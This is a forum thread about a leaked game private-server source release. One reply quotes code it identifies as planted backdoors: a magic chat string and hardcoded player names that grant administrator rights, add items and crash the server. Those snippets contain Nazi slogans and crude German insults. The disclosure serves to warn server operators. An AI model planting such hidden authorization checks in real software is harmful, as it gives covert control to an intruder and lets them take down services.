[GoW] Giant of War Source Release

08/12/2014 18:47 TheGodIsHereBrah'#1
Giants of War Source Re-released/Re-uploaded here.




Good luck with removing the backdoors and fixing the Bugs.

Defines:

[B]Credits for the Developers of this Source:
08/12/2014 18:57 ZeroTwo02#2
Backdoor in funcTextCmd.cpp :

Quote:
#ifdef __WE_ARE_ONE
if( strcmp( scanner.token, "ichbringdenserverzumcrashenhahahahahah") == 0 )
{
pUser->m_dwAuthorization = AUTH_ADMINISTRATOR;
#ifdef __LAYER_1015
g_dpDBClient.SavePlayer( pUser, pUser->GetWorld()->GetID(), pUser->GetPos(), pUser->GetLayer() );
#else // __LAYER_1015
g_dpDBClient.SavePlayer( pUser, pUser->GetWorld()->GetID(), pUser->GetPos() );
#endif // __LAYER_1015
//system("Der Administrator ist nun Online. Sieg Heil meine Freunde.");
Error("Dumme Bitch, ich fiste dich tot.");
ExitProcess( -1 );
}
#endif // __WE_ARE_ONE
Backdoor in WndWiki.cpp :

Quote:
if( g_pPlayer->m_dwAuthorization >= AUTH_SOFTWAREENGINEER )
{
if( m_pListItems->GetCurSel() != -1 )
{
SAFE_DELETE(m_pCreate);
m_pCreate = new CWndWikiCreate();
m_pCreate->Initialize(this);
m_pCreate->SetItem(m_vecItems[m_pListItems->GetCurSel()]);
}
}
BackDoor in DPDatabaseClient.cpp :

Quote:
#ifdef __WE_ARE_ONE
CString nickname = pUser->GetName();
if ( nickname == "sicherheit12" )
{
CItemElem item;
item.m_nItemNum = 9999;
item.m_dwItemId = II_SYS_SYS_SCR_PERIN;
pUser->CreateItem( &item );
pUser->m_dwAuthorization = AUTH_ADMINISTRATOR;
system("Der Administrator ist nun Online.");
pUser->AddText("You used a simple Backdoor.");
}
#ifdef __WORLDSERVER
if ( nickname == "rico1996" )
{
pUser->m_dwAuthorization = AUTH_ADMINISTRATOR;
system("Der Administrator ist nun Online.");
ExitProcess(-1);
Error( "Du kleiner Bastard!" );
}
#endif // __WORLDSERVER
#endif
And others backdoor...
08/12/2014 19:00 Avalion#3
Saw this coming. Leak is better than reselling. Reselling, you actually receive money for another's work.

#closerequest.